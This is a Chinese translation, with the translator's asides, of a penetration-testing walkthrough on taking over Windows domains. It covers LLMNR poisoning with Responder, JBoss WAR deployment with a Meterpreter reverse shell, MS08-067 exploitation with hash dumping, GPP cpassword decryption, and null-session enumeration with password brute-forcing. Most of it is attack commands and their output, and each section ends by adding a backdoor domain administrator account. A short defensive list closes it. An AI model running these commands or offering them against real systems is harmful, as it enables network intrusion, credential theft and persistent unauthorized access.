spiderlabs总结的,我简单翻译下,偶尔加点我的牢骚。 1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers \etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答 这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html),但实际测试还是Responder比较好,都是套用标准库写的,很方便在目标上使用:) ~/Responder# python Responder.py -i 192.168.8.25 NBT Name Service/LLMNR Answerer1.0.Please send bugs/comments to: lgaffie@trustwave.com To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started GlobalParametersset:Challengesetis:1122334455667788 WPAD ProxyServeris:OFF HTTP Serveris:ON HTTPS Serveris:ON SMB Serveris:ON SMB LM support isset to:0 SQL Serveris:ON FTP Serveris:ON DNS Serveris:ON LDAP Serveris:ON FingerPrintModuleis:OFF LLMNR poisoned answer sent to this IP:192.168.8.112.The requested name was : wpad. LLMNR poisoned answer sent to this IP:192.168.8.112.The requested name was : wpad. LLMNR poisoned answer sent to this IP:192.168.8.12.The requested name was :110.…snip… NBT-NS Answer sent to:192.168.8.6[+]SMB-NTLMv2 hash captured from:192.168.8.6Domainis: BEACONHILLSHIGH Useris: smccall [+]SMB complete hash is: smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash Share requested: \\ECONOMY309\IPC$ …snip... LLMNR poisoned answer sent to this IP:192.168.8.11.The requested name was : wpad.[+]SMB-NTLMv2 hash captured from:192.168.8.11Domainis: BEACONHILLSHIGH Useris: lmartin [+]SMB complete hash is: lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghash Share requested: \\ADVCHEM\311IPC$ …snip… 这里的LM, NTLMv1, or NTLMv2哈希,能够用GPU或者彩虹表暴力破解.如果在responder会话过程中,抓到一个域管理员帐号,能够直接使用winexe运行cmd.exe命令 ~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exeMicrosoftWindows XP [Version5.1.2600](C)Copyright1985-2001MicrosoftCorp. C:\WINDOWS\system32>net user twadmin $piD3rsRul3!/add /domain net user twadmin $piD3rsRul3!/add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu.The command completed successfully. C:\WINDOWS\system32> net group"Domain Admins" twadmin /add /domain net group"Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu.The command completed successfully. 2.利用jboss漏洞 可以前期先用nmap扫描下端口,识别出常见的JAVA应用服务器,后期配合Metasploit的auxiliary模块来利用.比如jboss漏洞. 最常见的就是弱口令了吧,同理的,也可以寻找webloigc,websphere,tomcat等这些基于JAVA的应用服务器,还有最近国内政府部门 部署比较多的Apusic,不过需要注意war包格式,进后台,直接部署WAR就行了.jboss的除了弱口令,还有个后台绕过,和流传很久的1337那 个.用例说下如何用metasploit暴力破解jboss后台,以及部署war包. msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080~/work/nmap# cat http.jboss.8080 <-- 这个是开25线程字典跑8080端口jboss后台的[*]Initializing modules... THREADS =>25 RHOSTS => file:./8080 DICTIONARY =>./http.scan.list RPORT =>8080[*]Detecting error code [*]Detecting error code [*]Detecting error code [*]Detecting error code [*]Using code '404'asnot found for192.168.5.18[*]Using code '404'asnot found for192.168.5.21[*]Using code '404'asnot found for192.168.5.20[*]Found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20)[*] http://192.168.5.20:8080/web-console/ requires authentication: Basic realm="JBoss JMX Console"[*]Found http://192.168.5.20:8080/web-console/ 404 (192.168.5.20)[*]Found http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20)[*] http://192.168.5.20:8080/jmx-console/ requires authentication: Basic realm="JBoss JMX Console"[*]Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21)[*]Scanned4 of 4 hosts (100% complete)[*]Auxiliarymodule execution completed Outputfromuse auxiliary/scanner/http/jboss_vulnscan:[*]192.168.5.20:8080/jmx-console/HtmlAdaptor requires authentication (401):Basic realm="JBoss JMX Console"[*]192.168.5.20:8080Checkfor verb tampering (HEAD)[+]192.168.5.20:8080Got authentication bypass via HTTP verb tampering [+]192.168.5.20:8080Authenticatedusing admin:admin [+]192.168.5.20:8080/status does notrequire authentication (200)[+]192.168.5.20:8080/web-console/ServerInfo.jsp does notrequire authentication (200)[+]192.168.5.20:8080/web-console/Invoker does notrequire authentication (200)[+]192.168.5.20:8080/invoker/JMXInvokerServlet does notrequire authentication (200)Outputfromuse exploit/multi/http/jboss_maindeployer: <--部署war包 msf exploit(jboss_maindeployer)> exploit [*]Started reverse handler on 192.168.5.233:4444[*]Sorry, automatic target detection doesn't work with HEAD requests [*] Automatically selected target "Java Universal" [*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war ... [*] Using URL: http:// 192.168.5.233:1337/HlveuqEzrovXH.war [*] Asking the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war [*] Sending the WAR archive to the server... [*] Sending the WAR archive to the server... [*] Waiting for the server to request the WAR archive.... [*] Shutting down the web service... [*] Executing HlusdqEcokvXH... [+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp' [*] Undeploying HlusdqEcokvXH... [*] Sending stage (30355 bytes) to 192.168.5.159 [*] Meterpreter session 1 opened (192.168.5.233:4444 -> 192.168.5.20:4209) at 2013-09-15 19:00:06 -0600 meterpreter > sysinfo Computer : BHHSMOFF011 OS : Windows 2003 5.2 (x86) Meterpreter : java/java meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\DELLBAC\EJBContainer\bin>whoami whoami beaconhillshigh\backup_admin C:\>net user twadmin $piD3rsRul3! /add /domain net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully. C:\>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully. 3.MS08-067 这个漏洞已经超过4年了,但是内网中还是有很多机器没有打补丁,影响的有(Windows Server 2000, Windows Server 2003, and Windows XP),不过说实话,我内网渗透的过程中很少用MS08-067,因为溢出不好,有可能造成DOS,被人发现了,就不好了,你懂得. nmap --script=smb-check-vulns.nse -v -v -p 445,139-iL smb -oA ms08 less ms08.nmap <--使用NMAP的smb-check-vulns脚本识别下...snip...Nmap scan report for shelob-squared (192.168.1.103)Hostis up (0.00042s latency).Scanned at 2013-09-1621:52:32 CDT for55s PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address:00:0C:29:E3:25:78(VMware)Host script results:| smb-check-vulns:| MS08-067: VULNERABLE <--bingo..有漏洞|Conficker:Likely CLEAN |SMBv2DoS(CVE-2009-3103): NOT VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive)|_ MS07-029: NO SERVICE (the DnsServer RPC service is inactive)...snip... nmap的NSE脚本是用LUA语言写的,把这些NSE都过一遍,对渗透很有帮助哦,尤其是在LINUX平台,win平台下除了有几种扫描方式利用不 了,NSE脚本照样可以用,不过LINUX上默认安装的NMAP版本都比较低了,你不能直接放NSE到目录,注意看库之间的依赖关系,才能利用,上次看 wooyun的drops,livers大牛回复我们组的Anthr@X牛的InsightScan.py,说用nse也实现了一个,我只想说,你能偷偷 发我一份吗? 接下来,还是用metasploit溢出,不知道对中文系统效果怎么样,我没有试过 =.= msf >use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi)>set RHOST 192.168.1.103 RHOST =>192.168.1.103 msf exploit(ms08_067_netapi)>set TARGET 0 TARGET =>0 msf exploit(ms08_067_netapi)>set LHOST 192.168.1.215 LHOST =>192.168.1.215 msf exploit(ms08_067_netapi)>set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi)> exploit [*]Started bind handler [*]Automatically detecting the target...[*]Fingerprint:Windows XP -ServicePack2- lang:English[*]SelectedTarget:Windows XP SP2 English(AlwaysOn NX)[*]Attempting to trigger the vulnerability...[*]Sending stage (752128 bytes) to 192.168.1.103[*]Meterpreter session 1 opened (192.168.1.215:33354->192.168.1.103:4444) at 2013-09-1621:54:15-0500 meterpreter > getsystem ...got system (via technique 1). meterpreter > sysinfo Computer: SHELOB-SQUARED OS :Windows XP (Build2600,ServicePack2).Architecture: x86 SystemLanguage: en_US Meterpreter: x86/win32 meterpreter > run hashdump [*]Obtaining the boot key...[*]Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2...[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hints...Frodo:"what do i have"Samwise:"Frodo"Stryder:"love"Legolas:"favorite saying"Gimli:"what am i"Boromir:"what I am"Gandalf:"moria"[*]Dumping password hashes...Administrator:500:f75d090d8564fd334a3b108f3fa6cb6d:3019d5d61cdf713c7b677efefc22f0e5:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8:::Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0:::Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622:::Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5:::Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a:::Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818:::Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2:::Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446::: meterpreter > shell Process2708 created.Channel1 created.MicrosoftWindows XP [Version5.1.2600](C)Copyright1985-2001MicrosoftCorp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\Gandalf C:\WINDOWS\system32>net user twadmin $piD3rsRul3!/add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully. C:\WINDOWS\system32>net group"Domain Admins" twadmin /add /domain net group"Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully. 4. GPO cpassword 这个原理完全可以看瞌睡龙牛翻译的:老外的一份渗透测试报告,本文中亮点是他从LINUX连接到WIN的,有许多同学不会通过linux渗透WIN域,尤其是在得到一个WEBSHELL,还是ROOT权限,还是跟内网连着,还有个域用户的情况下(=.=现实中哪儿有这么多好的条件让你都碰到了) smbclient -W MIRKWOOD -U ‘Legolas%orcs’ \\\\192.168.1.105\\SYSVOL <--使用smbclient连接,支持上传下载Domain=[ MIRKWOOD] OS=[WindowsServer2008 R2 Standard7600]Server=[WindowsServer2008 R2 Standard6.1] smb: \> dir . D 0WedSep1515:08:372012.. D 0WedSep1515:08:372012 mirkwood.local D 0WedSep1515:08:37201248457 blocks of size 4194304.44175 blocks available smb: \> cd mirkwood.local\ smb: \smirkwood.local\> dir . D 0WedSep1515:13:052012.. D 0WedSep1515:13:052012Policies D 0TueOct3010:29:312012 scripts D 0ThuNov812:50:212012 smb:\> recurse smb:\> prompt off smb:\> mget Policies…snip… getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874as access32.admx (3657.0KiloBytes/sec)(average 3657.0KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924as access34.admx (27324.5KiloBytes/sec)(average 7038.2KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217asActiveXInstallService.admx (2303.1KiloBytes/sec)(average 6722.5KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214asAddRmvPrograms.admx (2301.6KiloBytes/sec)(average 6446.2KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249as asdf.admx (122.0KiloBytes/sec)(average 4940.4KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AppCompat.admx of size 4893asAppCompat.admx (2633.2KiloBytes/sec)(average 4835.6KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865asAttachmtMgr.admx (2912.5KiloBytes/sec)(average 4752.0KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AutoPlay.admx of size 5591asAutoPlay.admx …snip… smb:\> recurse smb:\> prompt off smb:\> mget scripts …snip… smb: \avi\> mget scripts Get directory scripts? y Get directory bin? y Get file #INCLUDE.BAT? y getting file \ mirkwood \scripts\bin\#INCLUDE.BAT of size 2839as#INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON.BAT of size 1438as NETLOGON.BAT (28.9KiloBytes/sec)(average 137.7KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON2.BAT of size 16781as NETLOGON2.BAT (691.0KiloBytes/sec)(average 566.0KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON3.BAT of size 16486as NETLOGON3.BAT (1268.5KiloBytes/sec)(average 773.6KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON4.BAT of size 17429as NETLOGON4.BAT (1108.7KiloBytes/sec)(average 858.8KiloBytes/sec)…snip… Once the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance): grep -ri administrator . grep -ri cpassword .~/work/nmap/192.168.1.0-24/downloads/Policies# grep -ri administrator ../{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml::<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}"><User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User> The cpassword is taken and run through the decryption script from http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html. ~/work# ruby decrypt.rb <--解密 Local*P4ssword! ~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\’Administrator%Local*P4ssword!’ --uninstall --system //192.168.1.103 cmd.exe <-- winexe和win下经典工具psexec效果一样一样的MicrosoftWindows[Version5.2.3790](C)Copyright1985-2003MicrosoftCorp. C:\WINDOWS\system32> net user twadmin $piD3rsRul3!/add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully. C:\WINDOWS\system32>net group"Domain Admins" twadmin /add /domain net group"Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully. 5.NetBIOS Null Enumeration Allowed on Server 其实就是说,域服务器,允许你空会话连接,然后列举账户信息,然后在破解账户,LINUX下用enum4linux.pl遍历用户,用medusa破解帐号,用winexec连接执行命令.WIN下的话,<<黑客大曝光>>查点那章看过木? ~/enum4linux.pl -u Legolas -p orcs -w MIRKWOOD -a 192.168.1.90 >> enum-192.168.1.90 ~/work/targets/192.168.1.0-24# cat enum-192.168.1.90Starting enum4linux v0.8.7( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 10 10:15:14 2013==========================|TargetInformation|==========================Target...........192.168.1.90 RID Range........500-550,1000-1050Username.........''Password.........''KnownUsernames.. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================|EnumeratingWorkgroup/Domain on 192.168.1.90|===================================================[+]Got domain/workgroup name: MIRKWOOD ===========================================|NbtstatInformationfor192.168.1.90|===========================================Looking up status of 192.168.1.90 MODOR <00>- M WorkstationService MIRKWOOD <00>- M Domain/WorkgroupName MIRKWOOD <1c>- M DomainControllers MORDOR <20>- M FileServerService MAC Address= B5-AD-2F-37-2G-4F====================================|SessionCheck on 192.168.1.90|====================================[+]Server192.168.1.90 allows sessions using username '', password ''…snip…============================|Users on 192.168.1.90|============================ index:0x2b76 RID:0xd08 acb:0x00000610Account:AdministratorName:AdministratorDesc:(null) index:0x1822 RID:0xb0a acb:0x00000414Account:FrodoName:FrodoBagginsDesc:(null) index:0x1bga RID:0xc0a acb:0x00080210Account:SamwiseName:SamwiseGamgeeUserDesc:(null) index:0x1dc4 RID:0xc7a acb:0x00050210Account:StryderName:AragornUserDesc:(null) index:0x1823 RID:0xb0b acb:0x00007014Account:LegolasName:LegolasGreenleafDesc:(null) index:0x1824 RID:0xb0c acb:0x00010014Account:GimliName:Gimli son of GlóinDesc:(null) index:0x1825 RID:0xb0d acb:0x00300014Account:BoromirName:Boromir son of Denethor II Desc:(null) index:0x126f RID:0x9eb acb:0x00004014Account:GandalfName:Gandalf the GrayDesc:(null) index:0x1826 RID:0xb0e acb:0x00020015Account: gollum Name: gollum Desc:(null)…snip…~/work/targets/192.168.1.90# cat enum-192.168.1.90 .txt | grep "Domain Admins"Group'Administrators'(RID:544) has member: MIRKWOOD\Domain AdminsGroup:[DomainAdmins] rid:[0x200]Group'Domain Admins'(RID:512) has member: MIRKWOOD \Gandalf Group'Domain Admins'(RID:512) has member: MIRKWOOD \Stryder Group'Domain Admins'(RID:512) has member: MIRKWOOD \Administrator Group'Domain Admins'(RID:512) has member: MIRKWOOD \gollum Group'Domain Admins'(RID:512) has member: MIRKWOOD \Saruman S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins(DomainGroup) S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins(DomainGroup)~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa ACCOUNT CHECK:[smbnt]Host:192.168.1.1(1 of 62,0 complete)User: gollum (1 of 1,0 complete)Password: gollum (1 of 1 complete) ACCOUNT FOUND:[smbnt]Host:192.168.1.1User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK:[smbnt]Host:192.168.1.100(2 of 62,1 complete)User: gollum (1 of 1,0 complete)Password: gollum (1 of 1 complete) ACCOUNT FOUND:[smbnt]Host:192.168.1.100User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK:[smbnt]Host:192.168.1.105(3 of 62,2 complete)User: gollum (1 of 1,0 complete)Password: gollum (1 of 1 complete) ACCOUNT FOUND:[smbnt]Host:192.168.1.105User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK:[smbnt]Host:192.168.1.106(4 of 62,3 complete)User: gollum (1 of 1,0 complete)Password: gollum (1 of 1 complete) ACCOUNT FOUND:[smbnt]Host:192.168.1.106User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK:[smbnt]Host:192.168.1.107(5 of 62,4 complete)User: ssadmin (1 of 1,0 complete)Password: gollum (1 of 1 complete) ACCOUNT FOUND:[smbnt]Host:192.168.1.107User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK:[smbnt]Host:192.168.1.11(7 of 62,6 complete)User: gollum (1 of 1,0 complete)Password: gollum (1 of 1 complete) ACCOUNT FOUND:[smbnt]Host:192.168.1.11User: gollum Password: gollum [SUCCESS]…snip…~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exeMicrosoftWindows[Version5.2.3790](C)Copyright1985-2003MicrosoftCorp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\gollum C:\WINDOWS\system32>> net user twadmin $piD3rsRul3!/add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully. C:\WINDOWS\system32>net group"Domain Admins" twadmin /add /domain net group"Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully. 修补方法:[真心不希望管理员看到] 1.少用XP/win2k吧,否则为了某些兼容性,很少能全面禁止Netbios and LLMNR Name Poisoning 2.从知名站点下载软件安装程序,更换软件自带的默认口令 3.勤劳打全系统补丁 4.做好账户审核 5.禁止空会话,关键服务器,做好VLAN划分